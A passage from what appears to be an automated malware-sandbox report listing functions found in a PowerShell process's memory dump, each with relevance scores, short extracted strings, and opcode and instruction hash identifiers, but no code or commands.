                                                            • Opcode ID: 11ef731a7b3f0ed6747dd64cb74cfa2986dc0ffc0bd3e69a176ec1ff1e4f870c
                                                            • Instruction ID: e79a94f4d79f93323a94204be6dc5ade09429d3dd6f482f0ca691d61591465bb
                                                            • Opcode Fuzzy Hash: 11ef731a7b3f0ed6747dd64cb74cfa2986dc0ffc0bd3e69a176ec1ff1e4f870c
                                                            • Instruction Fuzzy Hash: 7B21F8F6B44206DBFB3D866C90103A6B7D69FC7111F1484FAC69A8F244DA31EC41C752
                                                            Function 07340EDC Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DOm$DOm$Gm$Gm
                                                            • API String ID: 0-2798509901
                                                            • Opcode ID: 7ded7f0a056e56212a5adf7569c2c343801e2b6567b7414ce2e9b9f5d168fb84
                                                            • Instruction ID: eb17d79170d6e7b17ce9438601eba1165274353d88aea419591e55ab39075214
                                                            • Opcode Fuzzy Hash: 7ded7f0a056e56212a5adf7569c2c343801e2b6567b7414ce2e9b9f5d168fb84
                                                            • Instruction Fuzzy Hash: C12127F67052039BF72D56A840503A6F7D29FC7211F1484FAD61E8F284DA35E84587A2
                                                            Function 07341BFC Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: a87b57e99ceade632e863fbe3a2e2dc17c570f951f0c11dddc31b3ee577d9430
                                                            • Instruction ID: e048330da5338b23a97d7758cc81ae825d882f46e0ee80f4de1ce0e1fdaedad5
                                                            • Opcode Fuzzy Hash: a87b57e99ceade632e863fbe3a2e2dc17c570f951f0c11dddc31b3ee577d9430
                                                            • Instruction Fuzzy Hash: 57214BF5B04A1B8BFB3D866C88203A6F3D65FC6111B2484B6C08A8B244DA71ECC1C791
                                                            Function 07343B84 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: 6d99496e8b967f660fba64c4fe69f90f3c72996ee1ed479c370e1c5cb8d3fd5c
                                                            • Instruction ID: 8f8a868a9c44c80aa014801bebef28065d446bbf3551ac17797ca4b7abab8ccb
                                                            • Opcode Fuzzy Hash: 6d99496e8b967f660fba64c4fe69f90f3c72996ee1ed479c370e1c5cb8d3fd5c
                                                            • Instruction Fuzzy Hash: EA2148F5B042039BF73D86A890103E6B7E2AFD6211F1480BBC15ADB285CB35EC51C7A1
                                                            Function 0734030B Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$$@r$$@r
                                                            • API String ID: 0-1035487990
                                                            • Opcode ID: 53e224d12fbb2acf601fdd208629249ecb2f1483c1adde8ca652f6c29849e771
                                                            • Instruction ID: 17f103fe4a256d4ff118c2a74623aa6cd801ae8ebbb5e4b282c43059291da71e
                                                            • Opcode Fuzzy Hash: 53e224d12fbb2acf601fdd208629249ecb2f1483c1adde8ca652f6c29849e771
                                                            • Instruction Fuzzy Hash: 2501A29171D7825FE76F126806202693FE24FC354072A80E7C084CF3EBC91A5C4A8B63